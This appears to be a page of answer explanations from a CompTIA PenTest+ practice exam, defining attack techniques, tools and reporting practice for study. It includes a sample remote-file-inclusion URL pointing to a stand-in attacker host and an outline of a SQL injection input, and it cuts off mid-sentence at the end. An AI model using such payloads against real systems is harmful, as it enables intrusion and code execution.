Free CompTIA PenTest+ Practice Test to Ace the (PT0-003) Exam

This technique, specifically known as double-tagging, is a form of VLAN hopping. It exploits the way some switches process 802.1Q tags to send traffic into a VLAN that the attacker’s port is not a member of.

The `os.system()` function executes a command in a subshell. If user input is passed to this function without proper sanitization, an attacker can inject additional OS commands (e.g., using `;` or `&&` on Linux).

Biometric scanners, locks, fences, and security guards are all examples of physical controls designed to protect physical assets and facilities.

The Executive Summary is written for management and decision-makers. It avoids technical jargon and focuses on the strategic implications of the findings.

Known as a ‘shebang,’ this line tells the system’s program loader that the script should be executed using the Bash interpreter located at `/bin/bash`.

The scanner correctly identified the vulnerable software version but failed to account for a mitigating control (the WAF), leading to a report of an exploitable vulnerability that, in context, is not. This is a common cause of false positives.

DLP solutions are specifically designed to monitor, detect, and block the unauthorized exfiltration of sensitive data. They use pattern matching (like regular expressions for credit card numbers) to identify and act on policy violations.

Clickjacking, or UI redressing, involves loading a site in a transparent iframe over a legitimate-looking page. When the user clicks on a visible button, they are actually clicking on a button on the hidden page.

The core function of an SSL certificate is to authenticate the server’s identity. When it expires, this authentication fails, which undermines both the confidentiality and integrity of the communication channel by making on-path (man-in-the-middle) attacks easier.

The User Interaction (UI) metric is set to ‘R’ for Required, meaning the vulnerability can only be exploited if a user takes some action, such as clicking a link or opening a malicious file.

Shadow IT introduces assets that are not monitored, patched, or configured according to corporate security standards, creating a significant blind spot and attack surface.

This is the classic definition of a buffer overflow. When more data is written to a buffer than it can hold, the excess data overwrites adjacent memory, which can lead to crashes or arbitrary code execution.

A rootkit is a collection of malicious software tools designed to enable administrator-level access to a computer while obscuring its presence by modifying core system components and APIs.

The Attestation of Compliance (AOC) is the final document that serves as official proof to the payment brands (Visa, MasterCard, etc.) that an organization has successfully completed a PCI DSS assessment.

An SPF record is a DNS TXT record that lists the mail servers authorized to send email for a specific domain. Receiving mail servers can check this record to verify the sender’s authenticity.

Chain of custody is a critical forensic process that documents who handled the evidence, when, and for what purpose. This is vital if the findings need to hold up in a legal proceeding.

Fuzzing is an automated testing technique that feeds a program a wide range of invalid inputs to see if it crashes, hangs, or exhibits other unexpected behavior, which can indicate vulnerabilities like buffer overflows.

A SYN scan sends a SYN packet and waits for a SYN/ACK response. If one is received, the port is open, and the scanner immediately sends a RST packet to tear down the connection before it is fully established.

In a reflected attack, the malicious script is part of the request sent to the web server, which is then reflected back to the user’s browser, which executes the script. It is not stored permanently.

The `$6$` prefix indicates a SHA-512 hash, which is strong and salted. Tools like Hashcat and John the Ripper are designed to perform dictionary, brute-force, and rule-based attacks against such hashes.

The input is crafted to alter the logic of a SQL query. The `’` closes the intended string, `OR 1=1` creates a condition that is always true, and `–` comments out the rest of the original query.

PowerShell is Microsoft’s task automation and configuration management framework, consisting of a command-line shell and associated scripting language built on the .NET Framework.

Mimikatz is a well-known post-exploitation tool famous for its ability to extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory on Windows systems.

This is a classic social engineering tactic. The drives contain malware (e.g., a reverse shell payload or keylogger) that executes when an unsuspecting employee opens a file on the drive.

The ‘zero-day’ refers to the fact that the vendor has had zero days to create a patch for the vulnerability because they are unaware of it. This makes such vulnerabilities particularly dangerous.

This is the precise definition of the principle. It aims to limit the damage that can be caused by an accident, error, or malicious attack by restricting access rights.

A SIEM’s core capability is to centralize security data from firewalls, servers, IDS/IPS, and other sources, and then use rules to correlate events and generate alerts for potential threats.

By defining infrastructure in code, organizations can prevent manual configuration errors and ‘configuration drift,’ ensuring every deployed environment is built to the same security standards automatically.

If a bucket is publicly readable, anyone on the internet who can find it can download its contents, leading to a potentially massive data breach if sensitive information is stored there.

Failing to remove backdoors, user accounts, or tools from a client’s network leaves them vulnerable to future attacks and is a major professional liability for the tester.

RFI is a high-severity vulnerability where a web application includes and executes a remote file (e.g., `?file=http://attacker.com/shell.txt`), allowing the attacker to run arbitrary code on the server.

This type of test simulates an external attacker with no inside information, requiring the tester to perform extensive reconnaissance to discover the attack surface, which aligns perfectly with the scenario.

Pivoting uses an initial foothold as a stepping stone. The compromised machine acts as a proxy or gateway, allowing the tester to ‘pivot’ their attack into internal networks.

This is the classic definition of session hijacking, where an attacker steals a valid session identifier (like a cookie) and replays it to the server to impersonate the legitimate user.

WPA3-Enterprise builds upon WPA2-Enterprise, using the 802.1X standard for authentication, typically against a RADIUS server. It offers the strongest security with individual user credentials and enhanced cryptographic protections.

A successful zone transfer dumps the entire DNS database for the domain, revealing the internal network structure by listing all hosts (A records), aliases (CNAMEs), and other records.

A rainbow table is a pre-computed lookup table used for reversing cryptographic hash functions. It is more space-efficient than a simple hash lookup table and is effective against unsalted hashes.

A good report translates technical findings into business risk and provides clear, prioritized steps the organization can take to improve its security posture.

This is the correct expansion. ATT&CK is a knowledge base of adversary behavior, structured around Tactics (the ‘why’ or goal), Techniques (the ‘how’ an adversary achieves a goal), and Procedures (the specific implementation of a technique).

By breaking the data into small pieces and sending them intermittently, often hidden within normal-looking traffic like DNS or HTTP requests, an attacker can evade detection systems that are looking for high-bandwidth anomalies.

The exploit creates the opening, and the payload is the code that runs through that opening to achieve the attacker’s goal, such as creating a reverse shell or adding a user.

ExifTool is a powerful command-line utility specifically designed to read, write, and edit metadata information in a wide variety of file types, including PDFs, images, and documents.

Allowing unauthenticated access to network shares is a classic example of a misconfiguration that violates security best practices and exposes data.

Password spraying involves trying a single, common password (like ‘Winter2025’) against many different user accounts. This is effective because it avoids repeated failed attempts on any single account, thus flying under the radar of most lockout policies.

This is the fundamental distinction. A vulnerability scan provides a list of ‘what might be broken,’ whereas a penetration test goes a step further to confirm if those weaknesses are truly exploitable and what level of access can be gained.

Proper network segmentation would place IoT devices on an isolated network segment (VLAN) with strict firewall rules preventing them from initiating connections to critical internal systems, thus containing the impact of a compromise.

A container escape breaks the isolation boundary between the container and the host, allowing an attacker to gain control over the host system itself, which is a critical security failure.

ICS and SCADA devices are often not designed to handle unexpected network traffic. An aggressive port scan or malformed packet can cause them to fail, which could have serious consequences in a physical process (e.g., shutting down a power grid).

This header tells the browser whether it is allowed to render a page in a ``, `